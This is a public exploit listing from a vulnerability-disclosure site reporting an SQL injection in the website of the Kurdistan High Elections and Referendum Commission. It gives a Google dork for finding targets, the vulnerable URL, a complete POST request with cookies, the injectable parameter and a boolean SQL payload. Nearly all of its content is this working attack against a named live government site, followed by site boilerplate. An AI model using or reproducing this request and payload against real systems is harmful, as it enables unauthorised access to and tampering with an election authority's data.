Kurdistan High Elections and Referendum Commission SQL Injection Vulnerability

2021.08.09
tr Emyounoone (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Kurdistan High Elections and Referendum Commission #Author: Emyounoone #Google Dork: inurl:about.aspx?type= #Date: 8/8/2021 #Tested On: Kali Linux #Target Home Page: https://www.khec.krd ------------------------------------------------------------------------------------------------ Vulnerable Path: https://www.khec.krd/about.aspx?type=1 POST https://www.khec.krd/about.aspx?type=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 6100 Referer: https://www.khec.krd/about.aspx?type=1 Cookie: 99=yes; 45=yes; 46=yes; 36=yes; 37=yes; 48=yes; 49=yes; 39=yes; ARRAffinitySameSite=b58ed186e2b61004b35a91eecc2993dae826e74b0fc1745b541dd38dfc4c05ef; 80=yes; 93=yes; 71=yes; 94=yes; 72=yes; 95=yes; 40=yes; ARRAffinity=b58ed186e2b61004b35a91eecc2993dae826e74b0fc1745b541dd38dfc4c05ef; 96=yes; 41=yes; 42=yes; 98=yes; 76=yes Host: www.khec.krd Parameter: __VIEWSTATEGENERATOR Payload: E809BCA5 AND 1=1 --


Vote for this issue:
85%
15%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top